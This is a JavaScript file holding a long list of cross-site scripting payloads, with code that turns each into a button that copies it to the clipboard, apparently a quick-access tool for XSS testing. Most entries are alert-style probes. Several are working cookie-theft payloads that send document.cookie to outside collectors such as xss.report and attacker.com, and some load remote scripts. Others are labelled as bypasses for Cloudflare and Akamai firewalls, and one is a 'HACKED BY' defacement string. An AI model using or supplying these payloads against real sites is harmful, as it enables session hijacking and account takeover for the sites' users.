const payloads = [
  "<script>alert(1)<\/script>",
  "\"><script>alert(1)<\/script>",
  "'><img src=x onerror=alert(1)>",
  "<svg onload=alert(1)>",
  "<body onload=alert(1)>",
  "<input autofocus onfocus=alert(1)>",
  "<details open ontoggle=alert(1)>",
  "\" autofocus onfocus=alert(1) x=\"",
  "'><svg/onload=alert(1)>",
  "\"<iframe src=javascript:alert(1)>",
  "';alert(1);//",
  "\";alert(1);//",
  "<\/script><script>alert(1)<\/script>",
  "javascript:alert(1)",
  "'-alert(1)-'",
  "<svg/onload=alert`1`>",
  "<img src=x onerror=eval('alert(1)')>",
  "<svg><script>alert&#40;1&#41;<\/script></svg>",
  "<img src=x onerror=console.log(1)>",
  "<svg onload=fetch('https://example.com')>",
  "<script>alert(1)<\/script>",
  "svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>",
  "<svg onload=eval(window.name)>",
  "\"><svg onload=prompt(document.domain);>.png",
  "嘼svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)<\/script>",
  "page=1\"><img src=x onerror=alert(1)>",
  "page=1\"><script>alert(1)<\/script>",
  "1'});});<\/script><script>prompt(\"HACKED BY \\nKUCINGPINTAR\")<\/script>",
  "<Svg%20Only=1%20OnLoad=confirm(atob(%27Q2xvdWRmbGFyZSBieXBhc3NlZA==%27))>",
  "\"><input%20onfocus=alert(1)%20autofocus>",
  "<img onerror​=\"location='javascript​:\\x2561lert(1)'\" src=\"x\">",
  "\">>>>>>><marquee>RXSS</marquee></head><abc><\/script><script>alert(document.cookie)<\/script><meta",
  "https://site.com/url=data:text/html,<​script>alert(\"howami\")<​/script> --> bypass",
  "'<00 foo=\"<a%20href=\"javascript:alert('XSS-Bypass')\">XSS-CLick</00>--%20/ -> bypass cloudflared",
  "\"-->\"\"/>0xr3dhunt<\/script><deTailS open x=\">\" ontoggle=(co\\u006efirm(document.cookie))``>\"",
  "\"-->\"\"/>0xr3dhunt<\/script><deTailS open x=\">\" ontoggle=(co\\u006efirm)``>\"",
  "\"><?/script>\"><--<img+src= \"><svg/onload?=alert(document.cookie)>> --!>",
  "\"><input type=\"hidden\" oncontentvisibilityautostatechange=\"confirm(/Bypassed/)\" style=\"content-visibility:auto\"> -> waf akamai",
  "upgrade: '\"><img src=x onerror=alert(1)>",
  "\"><Script>Alert(Document.Cookie)<\/Script>",
  "payload poliglota: jaVAsCrIpt:/*-/*`/*\\`/*'/*\"/**/(/* */onerror=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1)//>\\x3e",
  "<details open ontoggle=\"alert('SITE VULNERAVEL kkkkkk😉💀')\">",
  "<IMG \"\"\"><SCRIPT>alert(\"XSS\")<\/SCRIPT>\"\\>",
  "<a href=\"javascript:alert(String.fromCharCode(88,83,83))\">Click Me!</a>",
  "<IMG SRC=# onmouseover=\"alert('xxs')\">",
  "<IMG SRC= onmouseover=\"alert('xxs')\">",
  "\"><iframe src=\"https://ytiurin.github.io/tetris\" width=\"100%\" height=\"600\" frameborder=\"0\" allowfullscreen style=\"border:none;\"><\/iframe> -> xss pra jogar no site",
  "{{alert(document.cookie)}}",
  "<script>alert(1)<\/script>",
  "svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>",
  "<svg onload=eval(window.name)>",
  "\"><svg onload=prompt(document.domain);>.png",
  "嘼svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)<\/script>",
  "page=1\"><img src=x onerror=alert(1)>",
  "page=1\"><script>alert(1)<\/script>",
  "1'});});<\/script><script>prompt(\"HACKED BY \\nKUCINGPINTAR\")<\/script>",
  "<Svg%20Only=1%20OnLoad=confirm(atob(%27Q2xvdWRmbGFyZSBieXBhc3NlZA==%27))>",
  "\"><input%20onfocus=alert(1)%20autofocus>",
  "<img onerror​=\"location='javascript​:\\x2561lert(1)'\" src=\"x\">",
  "\">>>>>>><marquee>RXSS</marquee></head><abc><\/script><script>alert(document.cookie)<\/script><meta",
  "https://site.com/url=data:text/html,<​script>alert(\"howami\")<​/script> --> bypass",
  "'<00 foo=\"<a%20href=\"javascript:alert('XSS-Bypass')\">XSS-CLick</00>--%20/ -> bypass cloudflared",
  "\"-->\"\"/>0xr3dhunt<\/script><deTailS open x=\">\" ontoggle=(co\\u006efirm(document.cookie))``>\"",
  "\"-->\"\"/>0xr3dhunt<\/script><deTailS open x=\">\" ontoggle=(co\\u006efirm)``>\"",
  "\"><?/script>\"><--<img+src= \"><svg/onload?=alert(document.cookie)>> --!>",
  "\"><input type=\"hidden\" oncontentvisibilityautostatechange=\"confirm(/Bypassed/)\" style=\"content-visibility:auto\"> -> waf akamai",
  "upgrade: '\"><img src=x onerror=alert(1)>",
  "\"><Script>Alert(Document.Cookie)<\/Script>",
  "payload poliglota: jaVAsCrIpt:/*-/*`/*\\`/*'/*\"/**/(/* */onerror=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1)//>\\x3e",
  "<details open ontoggle=\"alert('SITE VULNERAVEL kkkkkk😉💀')\">",
  "<IMG \"\"\"><SCRIPT>alert(\"XSS\")<\/SCRIPT>\"\\>",
  "<a href=\"javascript:alert(String.fromCharCode(88,83,83))\">Click Me!</a>",
  "<IMG SRC=# onmouseover=\"alert('xxs')\">",
  "<IMG SRC= onmouseover=\"alert('xxs')\">",
  "\"><iframe src=\"https://ytiurin.github.io/tetris\" width=\"100%\" height=\"600\" frameborder=\"0\" allowfullscreen style=\"border:none;\"><\/iframe> -> xss pra jogar no site",
  "{{alert(document.cookie)}}",
  "<A/hREf=\"j%0aavas%09cript%0a:%09con%0afirm%0d``\">z",
  "<d3\"<\"/onclick=\"1>[confirm``]\"<\">z",
  "<d3/onmouseenter=[2].find(confirm)>z",
  "<details open ontoggle=confirm()>",
  "<script y=\"><\">/*<script* */prompt()<\/script",
  "<w=\"/x=\"y>\"/ondblclick=`<`[confir\\u006d``]>z",
  "<a href=\"javascript%26colon;alert(1)\">click",
  "<a href=javas&#99;ript:alert(1)>click",
  "<script/\"<a\"/src=data:=\".<a,[8].some(confirm)>",
  "<svg/x=\">\"/onload=confirm()//",
  "<--`<img/src=` onerror=confirm``> --!>",
  "<svg%0Aonload=%09((pro\\u006dpt))()//",
  "<sCript x>(((confirm)))``<\/scRipt x>",
  "<svg <\/onload =\"1> (_=prompt,_(1)) \"\">",
  "<\/Script><Image SrcSet=K */; OnError=confirm`1` //>",
  "<iframe/src \\/\\/onload = prompt(1)",
  "<x oncut=alert()>x",
  "<svg onload=write()>",
  "%0ajavascript:`/*\\\"/*-->&lt;svg onload='/*<\/template><\/noembed><\/noscript><\/style><\/title><\/textarea><\/script><html onmouseover=\"/**/ alert()//'\">`",
  "<svg onload=alert()>",
  "<\/tag><svg onload=alert()>",
  "\"><svg onload=alert()>",
  "\"><svg onload=alert()><b attr=\"",
  "\" onmouseover=alert() \"",
  "\"onmouseover=alert()//",
  "\"autofocus/onfocus=\"alert()",
  "'-alert()-'",
  "'-alert()//'",
  "'}alert(1);{'",
  "'}%0Aalert(1);%0A{'",
  "<\/script><svg onload=alert()>",
  "<svg/onload=\"(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML\">",
  "\\'-alert()//",
  "<\/script><svg onload=alert()>",
  "<object data=javascript:confirm()>",
  "<a href=javascript:confirm()>click here",
  "<script src=//14.rs><\/script>",
  "<script>confirm()<\/script>",
  "<svg/onload=confirm()>",
  "<iframe/src=javascript:alert(1)>",
  "<svg onload=confirm()>",
  "<img src=x onerror=confirm()>",
  "<svg onload=confirm()//",
  "<script src=//14.rs><\/script>",
  "<svg onload=co\\u006efirm()>",
  "<svg onload=z=co\\u006efir\\u006d,z()>",
  "<x onclick=confirm()>click here",
  "<x ondrag=aconfirm()>drag it",
  "<\/ScRipT>",
  "<\/script",
  "<\/script\/>",
  "<\/script x>",
  "<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>",
  "<svg onload=eval(window.name)>",
  "\"><svg onload=prompt(document.domain);>.png",
  "嘼svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)<\/script>",
  "<a autofocus onfocus=alert(1) href><\/a>",
  "<a autofocus onfocusin=alert(1) href><\/a>",
  "<a contenteditable onbeforeinput=alert(1)>test",
  "<a draggable=\"true\" ondrag=\"alert(1)\" style=display:block>test<\/a>",
  "<a draggable=\"true\" ondragend=\"alert(1)\" style=display:block>test<\/a>",
  "<a draggable=\"true\" ondragenter=\"alert(1)\" style=display:block>test<\/a>",
  "<a draggable=\"true\" ondragexit=\"alert(1)\" style=display:block>test<\/a>",
  "<a draggable=\"true\" ondragleave=\"alert(1)\" style=display:block>test<\/a>",
  "<a draggable=\"true\" ondragstart=\"alert(1)\" style=display:block>test<\/a>",
  "<a id=x style=\"transition:outline 1s\" ontransitionend=alert(1) tabindex=1><\/a>",
  "<a id=x tabindex=1 onfocus=alert(1)><\/a>",
  "<a id=x tabindex=1 onfocusin=alert(1)><\/a>",
  "<a onafterscriptexecute=alert(1)><script>1<\/script>",
  "<a onbeforecopy=\"alert(1)\" contenteditable>test<\/a>",
  "<a onbeforecut=\"alert(1)\" contenteditable>test<\/a>",
  "<a onbeforescriptexecute=alert(1)><script>1<\/script>",
  "<a onblur=alert(1) id=x tabindex=1 style=display:block>test<\/a><input value=clickme>",
  "<a onclick=\"alert(1)\" style=display:block>test<\/a>",
  "<a oncontentvisibilityautostatechange=alert(1) style=display:block;content-visibility:auto>",
  "<a oncontextmenu=\"alert(1)\" style=display:block>test<\/a>",
  "<a oncopy=alert(1) value=\"XSS\" autofocus tabindex=1 style=display:block>test",
  "<a oncut=alert(1) value=\"XSS\" autofocus tabindex=1 style=display:block>test",
  "<a ondblclick=\"alert(1)\" autofocus tabindex=1 style=display:block>test<\/a>",
  "<a onfocus=alert(1) autofocus tabindex=1>",
  "<a onfocusout=alert(1) autofocus tabindex=1 style=display:block>test<\/a><input value=clickme>",
  "<a onkeydown=\"alert(1)\" contenteditable style=display:block>test<\/a>",
  "<a onkeypress=\"alert(1)\" contenteditable style=display:block>test<\/a>",
  "<a onkeyup=\"alert(1)\" contenteditable style=display:block>test<\/a>",
  "<a onmousedown=\"alert(1)\" style=display:block>test<\/a>",
  "<a onmouseenter=\"alert(1)\" style=display:block>test<\/a>",
  "<a onmouseleave=\"alert(1)\" style=display:block>test<\/a>",
  "<a onmousemove=\"alert(1)\" style=display:block>test<\/a>",
  "<a onmouseout=\"alert(1)\" style=display:block>test<\/a>",
  "<a onmouseover=\"alert(1)\" style=display:block>test<\/a>",
  "<a onmouseup=\"alert(1)\" style=display:block>test<\/a>",
  "<a onmousewheel=alert(1) style=display:block>requires scrolling",
  "<a onpaste=\"alert(1)\" contenteditable>test<\/a>",
  "<a onpointercancel=alert(1)>XSS<\/a>",
  "<a onpointerdown=alert(1) style=display:block>XSS<\/a>",
  "<a onpointerenter=alert(1) style=display:block>XSS<\/a>",
  "<a onpointerleave=alert(1) style=display:block>XSS<\/a>",
  "<a onpointermove=alert(1) style=display:block>XSS<\/a>",
  "<a onpointerout=alert(1) style=display:block>XSS<\/a>",
  "<a onpointerover=alert(1) style=display:block>XSS<\/a>",
  "<a onpointerrawupdate=alert(1) style=display:block>XSS<\/a>",
  "<a onpointerup=alert(1) style=display:block>XSS<\/a>",
  "<a onscrollend=alert(1) style=\"display:block;overflow:auto;border:1px dashed;width:500px;height:100px;\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test<\/span><\/a>",
  "<a onwebkitmouseforcechanged=alert(1)>XSS<\/a>",
  "<a onwebkitmouseforcedown=alert(1)>XSS<\/a>",
  "<a onwebkitmouseforceup=alert(1)>XSS<\/a>",
  "<a onwebkitmouseforcewillbegin=alert(1)>XSS<\/a>",
  "<a onwebkitwillrevealbottom=alert(1)>XSS<\/a>",
  "<address onscrollsnapchange=alert(1) style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337<\/div><\/address>",
  "#05 makari, haveri\"> <img src=x onerror=alert(document.cookie)> -> xss stored pra campos de adress",
  "\"><svg/onload=alert(document.cookie)>",
  "#05 makari, haveri\"><script src=\"https://xss.report/c/seu_user\"><\/script>",
  "#05 makari, haveri\"><svg onload=\"new Image().src='https://xss.report/c/user?c='+btoa(document.cookie)\">",
  "#05 makari, haveri\"><input autofocus onfocus=\"fetch('https://xss.report/c/user?c='+btoa(document.cookie))\">",
  "<;IMG LOWSRC=\";javascript:alert(';XSS';);\";>;",
  "<;IMG SRC=\";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\";>;",
  "Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser",
  "exp/*<;XSS STYLE=';no\\xss:noxss(\";*//*\";);",
  "<;STYLE>;li {list-style-image: url(\";javascript:alert(&#39;XSS&#39;)\";);}<;/STYLE>;<;UL>;<;LI>;XSS",
  "<;IMG SRC=';vbscript:msgbox(\";XSS\";)';>;",
  "<;LAYER SRC=\";http://ha.ckers.org/scriptlet.html\";>;<;/LAYER>;",
  "<;IMG SRC=\";livescript:[code]\";>;",
  "%BCscript%BEalert(%A2XSS%A2)%BC/script%BE",
  "<;META HTTP-EQUIV=\";refresh\"; CONTENT=\";0;url=javascript:alert(';XSS';);\";>;",
  "<;META HTTP-EQUIV=\";refresh\"; CONTENT=\";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\";>;",
  "<;META HTTP-EQUIV=\";refresh\"; CONTENT=\";0; URL=http://;URL=javascript:alert(';XSS';);\";>;",
  "<;IMG SRC=\";mocha:[code]\";>;",
  "<;OBJECT TYPE=\";text/x-scriptlet\"; DATA=\";http://ha.ckers.org/scriptlet.html\";>;<;/OBJECT>;",
  "<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;",
  "<;EMBED SRC=\";http://ha.ckers.org/xss.swf\"; AllowScriptAccess=\";always\";>;<;/EMBED>;",
  "a=\";get\";;&;#10;b=\";URL(\";\";;&;#10;c=\";javascript:\";;&;#10;d=\";alert(';XSS';);\";)\";;&#10;eval(a+b+c+d);",
  "<;STYLE TYPE=\";text/javascript\";>;alert(';XSS';);<;/STYLE>;",
  "<;IMG STYLE=\";xss:expr/*XSS*/ession(alert(';XSS';))\";>;",
  "<;XSS STYLE=\";xss:expression(alert(';XSS';))\";>;",
  "<;STYLE>;.XSS{background-image:url(\";javascript:alert(';XSS';)\";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;",
  "<;STYLE type=\";text/css\";>;BODY{background:url(\";javascript:alert(';XSS';)\";)}<;/STYLE>;",
  "<;LINK REL=\";stylesheet\"; HREF=\";javascript:alert(';XSS';);\";>;",
  "<;LINK REL=\";stylesheet\"; HREF=\";http://ha.ckers.org/xss.css\";>;",
  "<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;",
  "<;META HTTP-EQUIV=\";Link\"; Content=\";<;http://ha.ckers.org/xss.css>;; REL=stylesheet\";>;",
  "<;STYLE>;BODY{-moz-binding:url(\";http://ha.ckers.org/xssmoz.xml#xss\";)}<;/STYLE>;",
  "<;TABLE BACKGROUND=\";javascript:alert(';XSS';)\";>;<;/TABLE>;",
  "<;TABLE>;<;TD BACKGROUND=\";javascript:alert(';XSS';)\";>;<;/TD>;<;/TABLE>;",
  "<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=\";javas]]>;<;![CDATA[cript:alert(';XSS';);\";>;]]>;",
  "<;XML ID=\";xss\";>;<;I>;<;B>;<;IMG SRC=\";javas<;!-- -->;cript:alert(';XSS';)\";>;<;/B>;<;/I>;<;/XML>;",
  "<;XML SRC=\";http://ha.ckers.org/xsstest.xml\"; ID=I>;<;/XML>;",
  "<;!--[if gte IE 4]>; <;META HTTP-EQUIV=\";Set-Cookie\"; Content=\";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;\";>;",
  "<;XSS STYLE=\";behavior: url(http://ha.ckers.org/xss.htc);\";>;",
  "<;SCRIPT SRC=\";http://ha.ckers.org/xss.jpg\";>;<;/SCRIPT>;",
  "<;BR SIZE=\";&;{alert(';XSS';)}\";>;",
  "<;IMG SRC=JaVaScRiPt:alert(';XSS';)>;",
  "<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;",
  "<;IMG SRC=`javascript:alert(\";RSnake says, ';XSS';\";)`>;",
  "<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;",
  "<;DIV STYLE=\";background-image:\\0075\\0072\\006C\\0028';\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.10530053\\0027\\0029';\\0029\";>;",
  "<;HEAD>;<;META HTTP-EQUIV=\";CONTENT-TYPE\"; CONTENT=\";text/html; charset=UTF-7\";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-",
  "\\\";;alert(';XSS';);//",
  "<;/TITLE>;<;SCRIPT>;alert(\"XSS\");<;/SCRIPT>;",
  "<;STYLE>;@im\\port';\\ja\\vasc\\ript:alert(\";XSS\";)';;<;/STYLE>;",
  "<;IMG SRC=\";jav&#x09;ascript:alert(';XSS';);\";>;",
  "<;IMG SRC=\" &;#14;  javascript:alert(';XSS';);\";>;",
  "<;SCRIPT/XSS SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;",
  "<;BODY onload!#$%&;()*~+-_.,:;?@[/|\\]^`=alert(\";XSS\";)>;",
  "<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;",
  "<;<;SCRIPT>;alert(\";XSS\";);//<;<;/SCRIPT>;",
  "<;IMG \";\";\";>;<;SCRIPT>;alert(\";XSS\";)<;/SCRIPT>;\";>;",
  "<;SCRIPT a=\";>;\"; SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;",
  "<;SCRIPT>;document.write(\";<;SCRI\";);<;/SCRIPT>;PT SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;",
  "<script>document.vulnerable=true;<\/script>",
  "<img SRC=\"jav ascript:document.vulnerable=true;\">",
  "<img SRC=\"javascript:document.vulnerable=true;\">",
  "<body onload!#$%&()*~+-_.,:;?@[/|\\]^`=document.vulnerable=true;>",
  "<\/title><SCRIPT>document.vulnerable=true;<\/script>",
  "<input TYPE=\"IMAGE\" SRC=\"javascript:document.vulnerable=true;\">",
  "<body BACKGROUND=\"javascript:document.vulnerable=true;\">",
  "<body ONLOAD=document.vulnerable=true;>",
  "<br SIZE=\"&{document.vulnerable=true}\">",
  "<link REL=\"stylesheet\" HREF=\"javascript:document.vulnerable=true;\">",
  "<style>li {list-style-image: url(\"javascript:document.vulnerable=true;\");}<\/STYLE><UL><LI>XSS",
  "<img SRC='vbscript:document.vulnerable=true;'>",
  "<meta HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:document.vulnerable=true;\">",
  "<IFRAME SRC=\"javascript:document.vulnerable=true;\"><\/iframe>",
  "<div STYLE=\"background-image: url(javascript:document.vulnerable=true;)\">",
  "<div STYLE=\"width: expression(document.vulnerable=true);\">",
  "<style>@im\\port'\\ja\\vasc\\ript:document.vulnerable=true';<\/style>",
  "<img STYLE=\"xss:expr/*XSS*/ession(document.vulnerable=true)\">",
  "<style TYPE=\"text/javascript\">document.vulnerable=true;<\/style>",
  "<base HREF=\"javascript:document.vulnerable=true;//\">",
  "<head><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> <\/HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-",
  "<div onmouseover=\"document.vulnerable=true;\">",
  "&<script>document.vulnerable=true;<\/script>",
  "&{document.vulnerable=true;};",
  "<a href=\"about:<script>document.vulnerable=true;<\/script>\">",
  "<body onload=\"document.vulnerable=true;\">",
  "<style><\/script>",
  "<script>document.vulnerable=true;<\/script>",
  "<img src=\"blah\"onmouseover=\"document.vulnerable=true;\">",
  "<xml id=\"X\"><a><b><script>document.vulnerable=true;<\/script>;<\/b><\/a><\/xml>",
  "<style>@import'http://www.securitycompass.com/xss.css';<\/style>",
  "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://www.securitycompass.com/scriptlet.html\"><\/object>",
  "<script a=\">\" SRC=\"http://www.securitycompass.com/xss.js\"><\/script>",
  "<script a=`>` SRC=\"http://www.securitycompass.com/xss.js\"><\/script>",
  "\";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\\]^`=alert(\";XSS\";)>;",
  "<;/script>;<;script>;alert(1)<;/script>;",
  "<;/br style=a:expression(alert())>;",
  "<;scrscriptipt>;alert(1)<;/scrscriptipt>;",
  "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>",
  "\"><script>alert('XSS')<\/script>",
  ">\"><script>alert(\"XSS\")<\/script>&",
  "\"\"><STYLE>@import\"javascript:alert('XSS')\";<\/STYLE>",
  "'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'",
  "<IMG SRC=\"javascript:alert('XSS');\">",
  "<IMG SRC=javascript:alert('XSS')>",
  "<IMG SRC=JaVaScRiPt:alert('XSS')>",
  "<![CDATA[<script>var n=0;while(true){n++;}<\/script>]]>",
  "<script>alert('XSS')<\/script>",
  "%3cscript%3ealert('XSS')%3c/script%3e",
  "<img src=xss onerror=alert(1)>",
  "<IMG \"\"\"><SCRIPT>alert(\"XSS\")<\/SCRIPT>\">",
  "<BODY ONLOAD=alert('XSS')>",
  "<<SCRIPT>alert(\"XSS\");//<<\/SCRIPT>",
  "\"><s\"%2b\"cript>alert(document.cookie)<\/script>",
  "<scr<script>ipt>alert(1)<\/scr<\/script>ipt>",
  "<marquee onstart='javascript:alert(\"1\");'>=(◕_◕)=",
  "\"onclick=prompt(8)>\"@x.y",
  "<image/src/onerror=prompt(8)>",
  "<img/src/onerror=prompt(8)>",
  "<\/scrip<\/script>t><img src =q onerror=prompt(8)>",
  "<script\\x20type=\"text/javascript\">javascript:alert(1);<\/script>",
  "<img src=1 href=1 onerror=\"javascript:alert(1)\"><\/img>",
  "<audio src=1 href=1 onerror=\"javascript:alert(1)\"><\/audio>",
  "<video src=1 href=1 onerror=\"javascript:alert(1)\"><\/video>",
  "<iframe onLoad iframe onLoad=\"javascript:javascript:alert(1)\"><\/iframe onLoad>"
];

document.addEventListener('DOMContentLoaded', () => {
  const container = document.getElementById("container");

  payloads.forEach((payload, index) => {
    const btn = document.createElement("button");
    const preview = payload.length > 25 ? payload.substring(0, 25) + "..." : payload;
    btn.textContent = `${index + 1}. ${preview}`;

    btn.onclick = async () => {
      try {
        await navigator.clipboard.writeText(payload);
        const originalText = btn.textContent;
        btn.textContent = "✅ Copiado!";
        setTimeout(() => { btn.textContent = originalText; }, 800);
      } catch (err) {
        console.error('Erro ao copiar:', err);
      }
    };
    container.appendChild(btn);
  });
});